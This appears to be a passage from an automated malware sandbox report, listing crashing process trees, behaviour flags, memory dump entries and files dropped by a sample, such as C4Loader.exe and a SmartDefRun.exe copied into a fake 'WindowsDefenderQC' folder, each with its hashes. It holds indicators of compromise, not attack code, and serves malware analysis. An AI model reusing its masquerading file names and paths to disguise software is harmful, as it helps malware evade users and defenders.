C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3144 -s 4722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1184 -s 4522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4292 -s 4602⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 916 -s 4921⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4320 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2196 -s 4962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3388 -s 4642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2320 -s 4962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1164 -s 4202⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3468 -s 2282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1556 -s 6882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3128 -s 3842⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4020 -s 4841⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1384 -s 6561⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3328 -s 3681⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1508 -s 6562⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4576 -s 3041⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4068 -s 4841⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4392 -s 6561⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3688 -s 4602⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3196 -s 6481⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 444 -s 4881⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4380 -s 4681⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1764 -s 3561⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
SHA512b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9
-
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
SHA512b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER14B2.tmp.csvFilesize
37KB
MD5988c8e1a68845c638d7acc258d63b1f1
SHA1ae6326887f7fed730c7e2f8cadb26ac0b665d877
SHA2566603dd61490a36fba7da03d424828e76ac980ec0ae0aee83875665c1a703e003
SHA512fc98652db028a448c72c830f462236aa53e13cea2598ee94b5b06ff9229457b494490543b424d22d56f4aeeab6e54b919298d6d2bd6df4d69e80daf4dd98e912
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1501.tmp.txtFilesize
13KB
MD571e31bd4908c3292544901ae869f343c
SHA119fb0ccd1793b13aa7d818d554453e3b3129d3fb
SHA25637d69ee62910b3dab19c7cc1935a5ef48f694b83db9ad322a86f027c9e59f002
SHA512e6c71fc6dc75c4eaf6aa1a4d55001d43c4c66c8a92aa6dd103b6ad0da9ce0c84accfef81730fa1955276561e094f5f666464f03ae21f9f4171cd3fde83eece7d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1735.tmp.csvFilesize
36KB
MD53ee543533adf2a4b20b1fafd81f652e7
SHA188beb31e0ba8449cb4c57561b6c4584f5aa1b633
SHA25687374d1470d05ad837144aab58fb884dcf536b8c4b2e0d85821b6d5a13f8a44f
SHA5124ac4a378628df3b5b9ac767cb9e898438bd935f173908aede5c21682dd8ec64838ad2a88618694d13a112763c7420bd837c9ac8cf070c6bc47868f850fbc9bd7
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1774.tmp.txtFilesize
13KB
MD5c4a1d6bc08af620fdb9901bc28234c07
SHA103ec5efb8ef587f12b3bf47014c04567bcaec463
SHA25632dd4478c75314a2d1bef2e75468f6a76ff3f51b6d63e236e09cc151ed01edfc
SHA512fc311075237e6261a179b474244148a1c4957e41f288e906876bdf2fda660a6b3b2bf1408e09c4508ccc4d442bc71dd09eb9c0e2ef3260049d9422164eccd985
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BDA.tmp.csvFilesize
37KB
MD57078cd6d77a26e1143bf0a05b0c55f5a
SHA1bfcd58eb632ac8f671bb8d84c927007c7def145f
SHA2563a3fbbd44b43ab13fbfaee0abeac3e9cc1bf0105f7040f495438f9ba7e1d02c7
SHA512ad4b8b89d6e263c73fcf4d7ba90b8a79c458f7c2291dbf8e876139282cbd2f14b50181d71e70feeaaa0aa90a23f255c00d45cd8c087e7cdf9c7cdd9537b47f38
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BDB.tmp.csvFilesize
37KB
MD545e16a1bc9e58e9d448c7628912b9681
SHA1af3e6fc35c233c27feae717f286559db8fc3b4c6
SHA25656608fd736fd3ba444fbe07aa22f08331534c86db3f8336887e81a451f3aa61b
SHA5126d4b1b48bf94398a2d276415e1198bda37baac7c035ee6e667d143748867d6a434bf4b571f9c3f4b5362276cc5287732e82dcc77269356607043b473ed92a32b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C0B.tmp.txtFilesize
13KB
MD56c1f63bb05bf3efb3bf6742020116a4e
SHA1261cff97952e60c4ce3d1e7ede585a0b60981d8d
SHA2565a99c5a6fd444c59405537c098dc6592f033bc1574272b768ffa619ab9205c01
SHA512261c52b2b86a84e8f785515da2e961095afa0668e34295a94f5fad32dd2743e474509ffb38cf80cd5bb150c56efb86828fec00da55336e8d19398efdf66339d3
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C1C.tmp.txtFilesize
13KB
MD536420981d9c22d56511a56f33c6ec10d
SHA18b98a614a7c7bc061ab8baccd91725eecd0e7c03
SHA25638e4f3483e12f74a7c33beba50c1ca168e43971c6eba2de4581a0bef97893bd0
SHA51281f656404cf15269d9702d2cb0170c336abcc9a3367c051d066ae8f9acab49c77a3b9360acd7b3d41a396140dcfcd66a131e53a78b1f1de26181c408090c9c62
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2033.tmp.csvFilesize
37KB
MD50bf97906d44d9d1fecaa8ac7dbd96c6a
SHA151672d2cc17ec71e061b3cc67c946c744018c5c2
SHA256f76fab24245bea983aebb5e11c7cb13f086ded9780093f231cb69150aa371da5
SHA512649fd76ced222203cfb28e08c8cc5822c33938718eae78d9416c4df04286b1075bd7d0f956a439d02ca4c34cead995f2a20f829faafababe02530ff40d497530
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2073.tmp.txtFilesize
13KB
MD5629a4366e5663343541c2dcef65f6a18
SHA189a3eb14899fba7c9a3f19cba2201bef08c16560
SHA25637b869e04100a745075ee5e5f58bf5efb54d4b293e2687f48fd6e6d6ec93aa3a
SHA5129991c5098915422396c353543e49df367b6109b424d28af4e5dc81dc2b3b2cbe5703fefb4fee17a141b97e081ac960b4e72e7a596d9535b00a51dd19e502bc06
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2258.tmp.csvFilesize
37KB
MD5297a60594d10f59b7a3dd871099df7ad
SHA1cdb3cb5516238d8a54cd1492c8cef06abf2a3e77
SHA2564858d1d378b4a2abcab5b7d1fcfe32b254c42ed353b33ebbc9cc055255591113
SHA5123fa6e8738df220415ee8e4d9ba190b3bdca11868ebbe8519128c14115a4efee12a2f7dfdaf0f4f229b23cedb37b4495d2eb4fb150ad5fc4ac73481c906fd0eb2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2298.tmp.txtFilesize
13KB
MD5b465e3905b3adc4c3890b4cd068726b1
SHA127000e78ee17bc27832af2e9192511676bb46013
SHA256ec8023ae37a175c2773657c0dbc55f801a56dc736d87b30662189ac7d050e182
SHA512e1ecb850134dbbd741327b800118e08bb72b29b5647e5ee88b778f81ef591ce823fa1f60677b3dbf857e9c6a0866c2d60f6feea9c5a89ca945105652c7a106fb
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER23F1.tmp.csvFilesize
36KB
MD552801faecbd1ce39518547303a81ba07
SHA14d9874062ed039f8fd1aa2b4ae0c42c1cc552f10
SHA25656b58fadca8d88b227b0f54acedc76b8aa1927593f007b5ade8575a1512d1ffe
SHA512d75117a59419d0daa81fda23f5f36073b472bde275a8fdde0b72a69b438d1e9f758a60174e5e4db12dd826eaee0ac5757e5b5a5f8c278a0fb3a7e6cd777f0d62
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2440.tmp.txtFilesize
13KB
MD523eee732d3afcf0278ccda5b4697595c
SHA1ec936950825fd90512b7bf402f5c7235b2eca455
SHA25684921c8b84b878bc9f3424a77450b4f95026f35c72c2b7567567e97fcdfe0357
SHA51208cd8696c3917af753c48f25bae56fbe1b80dcfeb7d2ae0d7f1c8592eebee8c40c0bbdc7fda7947b931a0ef6016ddd77532de167652eb03f249ccf73c17c01fb
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B26.tmp.csvFilesize
38KB
MD5f23827d0e54a6909236dde86d80eea1a
SHA1384243e94f83dd304132494eea7da6c5c2d2e52d
SHA256f456c4c8c952178b89b44a40dd54dd4050b7be8737ffbdb715ff3b2391fd786e
SHA5126e22112fb0117ff31581d466a4c271b3598627e59852444e95417147cf1b8011c7af02b84fc8251402516a12ff58a5178982cd90a5fa52d031cbfd632e5aa2de
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B37.tmp.csvFilesize
38KB
MD5b6679460f62586bf17d89d06870b8cf6
SHA1610dd0e0240fc7847faf3781761cca440dfd503c
SHA2565074c0cfa6227c5109cc71be38f4633e7270adcd5432d3c9568a309fff558176
SHA51231dab7fe0c865080c8da7ad2b3047090f19470438c1e40f30590844e371a8ca29118dda8986fecea4da02a5a713c8e8c62f8163f876efba4d5ca192072c352ad
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B67.tmp.txtFilesize
13KB
MD537fdef71d0a88865f22d5ad45d49a93d
SHA15485ee953d8096f640f0b1f43216e4f7b9857c03
SHA256b09f48fa4a8c3920a525bc3d9ecf1a7d29488b4d46c33a510acbb2d20de142dd
SHA51263099dc782bd7fc5d21480f4ccc1bb471bceaf07049f5945f02398564d996753ae5d221cf0cd1c3a76c99b8298cdcfcf9b3b08e7fe31115fd813bd6633ef99d7
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B87.tmp.txtFilesize
13KB
MD5fe310eb5198978a57f4e87617d070eb8
SHA18e38980483571bfebf898be1ff1be23a292a366d
SHA25638873dfd5bdab1baa48dc2dbfbe564458ab0528dc28a6159a7e50c345da59a63
SHA512ddda23f163a07fc1852befb419a6b8da438e5f316948b2fbe72b165577bf21dfe8d5abe23dffdeb04c209d5bf812efee499d36af8c18bae52dcff8f113e73f52
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER31F1.tmp.csvFilesize
37KB
MD518ff64dbbdc60a369ad84c4ea06894ab
SHA1e9fbeb6148eb33d817a4c06d4b4bb5ab151f3930
SHA2565d19f37c4dbbbacd692ab340bdb068c7736fa99401f70b21302deb9da3ebcaa2
SHA51242edd76ebf1ee4329819f12c31eb2636920e13305194c192578021a91e2829eeaa113b2530d1445fefedeef6e604cbc472c9dd34491dfb977445dec44f5fbe84
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER325F.tmp.txtFilesize
13KB
MD5a66c4adc4bfc66a3dec6b5c069fa832d
SHA159747fd51394f5c147a319c1953ca7b63944e90b
SHA2564d826cc172b0a1f7a380e392b8dd18ecf6461be58b157744050a99fe4b314397
SHA5126562f6bdc922f796d91bda74ec7f711920760cb114a2d5865612aad6b5eb6e004777be5a0ebf183e655069f5f950c77ac848c1604cf7584bf1b90537aec8a920
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER32ED.tmp.csvFilesize
36KB
MD51dcc48f951a0bc0bc0cc3f921a3b8bdc
SHA1a604192a41dfe856a4f101c0182a220dccfa0146
SHA2560575f6a2c7d9e7a44d4b93e704f952890e22b4d11b1ee2438edd66a3fa39ba11
SHA51210af4841c5cdd61163ca06633de3d67c951f662a85a6283af4eb2df2ccbc90cc41fccce53e0d8e20d089251d1e0ff151128a5076a9a8c6f3d13d7afb14503df0
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEA8.tmp.csvFilesize
38KB
MD5b55c2d35519dbba2676bbd5790f7fb94
SHA199857b0a21ba19ad0c55479a4636b0a29c1a8f9a
SHA25681dbb19596e471672749acf14d46b087015ef7e53c7e0c7f894d8119a1bbd1ca
SHA5127c8754f0fcff2ff58fae27a1058493f554d1db143d0937501e58b60c97a8b8cca536b80890005d96421ed5589bf1328ce55eae63ca7753ac7f77b33b79987d8c
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF26.tmp.csvFilesize
38KB
MD559c5b577450278743a0f8bd4d068b0fb
SHA12aac45a951af4711d28e67614591c1b2918ed461
SHA2564ef28cfe17e035a7951f670ff1ac6db0110ce9ccca077667fe26e84f1a83269e
SHA5122d76fe2e71485f6dde219dd16287abfc366ee78aaaf7e42706f5c1ec1808c2ad340ec0f7566498813476130243c9c49be9538499059d2a423e36820aaa03b46f
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF36.tmp.txtFilesize
13KB
MD5506cb14705fc0f06234d86f0098d821c
SHA1618f421e6c11200f3f844bb440408c9ba4c69182
SHA2569aedb4539efddcf79d8977c7f436c2e5c1c6a26d39cc164e9550c52bcf792065
SHA512896d53f80789d715a1b9e1fc3fcd0a3ae798380ea84698e9084183511faae5ad902218286cf171f94aac50dc928550061184d21ad05756fc1df12d6e4a77fe02
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFA5.tmp.txtFilesize
13KB
MD5561107937b6c836271ab59b1f8082958
SHA1ba8ef6692efcef5e393be4e173e9561e681f693d
SHA2561731ccf6be209ab07e93de373ce1c8d77592a3a700f4636499ab0774a2953917
SHA5123cdf09f55dd3e455d0fb2d30e0e5b100e9161e5b1c6652ce9b3fed5db13b5058eaa7281782a022d75a556657bafb44b092454ddab1b035a38aa86d6cbea9679f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD5856d2e6d280b7da3dff2b2991b7c2948
SHA10c0516ddad3cb79517f6903097e5d7266878cc18
SHA2560d2a4fe4e7e5cde0eb3023cfc2e5f43a76c87bb625ffe179e4a89df4d09db6fe
SHA512c829b1fc86f6369af708a1423f037feebccd3a23189b6b581b37b4d09af773f2c6e85891b92a83aec30911d8e33c467f2bb331ca3be32e1e05b5bd24ad8347f8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56539a34c74920a5c656922258c336b5f
SHA136a74be3126b4aa0deef6e094d6199b8f5056645
SHA2565427dfb4d22bef830b6f6b395b51489a791db48865572adfcb2f8c752293aae7
SHA512bceb8b61e27e0b710d144005ea93419a8299c70d87188cd8a40253fac32f0a297008f333a1576fa357c5442a395429865a327db8471e048c19f0a0de3b712615
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD5440285064287149ddc07a8c613e52d8c
SHA1d35745950a232f19e81a65fe7c256c0ae723feaa
SHA256982d345fed4bd3aacb55e9398d0917a99cc192e8ab0bd7b6e969a169cf8dba0b
SHA512e882b2e33f566d0f0391b5fef8e7f0ee5068b8b21b9b6e4dc22c2e6aaace0f3a298ed6f8c65e2685206ab88f32a9c6a8bdd95bb8319ecb43687cf264e390c981
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.datFilesize
14.0MB
MD5a4fb0c0e7d2b44077d2277927bcbd22f
SHA16c610d376218616dd0b9b237086f632ef635dc2a
SHA2567881a65dca3a98b3d889110824430ae77ca0e6f4a707cd004eeabbb452e24d25
SHA5123db1e5327f2af76224f503501a61c018641fdd520c232e5be490471adbd93a512a7e687ac350de9024fb59e6438f1a738e6897193cd3bcfe1d021ab852f3c117
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfmFilesize
16KB
MD5f3a90c940c18780b8e311f590303fa10
SHA1e5895d3ed5b5f8f84cb1b7c15f6cb2bdfb15f794
SHA256cad9eef26a3faffc96d1dcfadc4f6ef992277786b8fcb0a2cb2f85ea408a2261
SHA512282bb68c0d2d9376c3eb24ccf7ec542bc70f1bcd15f24bd18c7e064743e1956bd3372dbaf8019352f767d3ed1370b45cefca53447ab199d532c8ddf1464f4688
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfmFilesize
16KB
MD5ca669ee21f2dbae18ab22f17442ff3d7
SHA1206dabc1e8c52552ef667bf4c72a209388b4aa0a
SHA25616262c1d9c1708cedee57f2ab2d901597e0a591e1f6eef6f79a46c3486752d4e
SHA51228a2c43eebc83def93caa2eb7a8a36367f181d74f646ed8a66cb21199c7bb98c7d03636e83705be0ed8ae7a5973c583fb8e1ffc6709af3ca1097800ecc738292
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
2.7MB
MD543a0526a928f9daca9c953221406af8e
SHA134fdd0d94ecfe8c887ebb164068579013d2c611b
SHA25688e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986
SHA5129632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
2.7MB
MD543a0526a928f9daca9c953221406af8e
SHA134fdd0d94ecfe8c887ebb164068579013d2c611b
SHA25688e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986
SHA5129632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
SHA512b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
SHA512b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
590KB
MD5d83c68b004860f9df81e16471daef592
SHA1b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c
SHA256fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b
SHA512a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
590KB
MD5d83c68b004860f9df81e16471daef592
SHA1b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c
SHA256fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b
SHA512a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD54ac8a26e2cee1347880edccb47ab30ea
SHA1a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
memory/212-192-0x0000000000000000-mapping.dmp
-
memory/212-464-0x0000000000000000-mapping.dmp
-
memory/212-240-0x0000000000000000-mapping.dmp
-
memory/212-350-0x0000000000000000-mapping.dmp
-
memory/256-234-0x0000000000000000-mapping.dmp
-
memory/312-270-0x00007FFF56550000-0x00007FFF56560000-memory.dmpFilesize
64KB
-
memory/440-276-0x00007FFF56550000-0x00007FFF56560000-memory.dmpFilesize
64KB
-
memory/548-535-0x0000000000000000-mapping.dmp
-
memory/588-269-0x00007FFF56550000-0x00007FFF56560000-memory.dmpFilesize
64KB
-
memory/656-455-0x0000000000000000-mapping.dmp
-
memory/676-277-0x00007FFF56550000-0x00007FFF56560000-memory.dmpFilesize
64KB
-
memory/732-274-0x00007FFF56550000-0x00007FFF56560000-memory.dmpFilesize
64KB
-
memory/764-198-0x0000000000000000-mapping.dmp
-
memory/808-190-0x0000000000000000-mapping.dmp
-
memory/868-275-0x00007FFF56550000-0x00007FFF56560000-memory.dmpFilesize
64KB
-
memory/880-204-0x00007FFF77840000-0x00007FFF78301000-memory.dmpFilesize
10.8MB
-
memory/880-212-0x00007FFF77840000-0x00007FFF78301000-memory.dmpFilesize
10.8MB
-
memory/956-271-0x00007FFF56550000-0x00007FFF56560000-memory.dmpFilesize
64KB
-
memory/1000-510-0x0000000000000000-mapping.dmp
-
memory/1036-273-0x00007FFF56550000-0x00007FFF56560000-memory.dmpFilesize
64KB
-
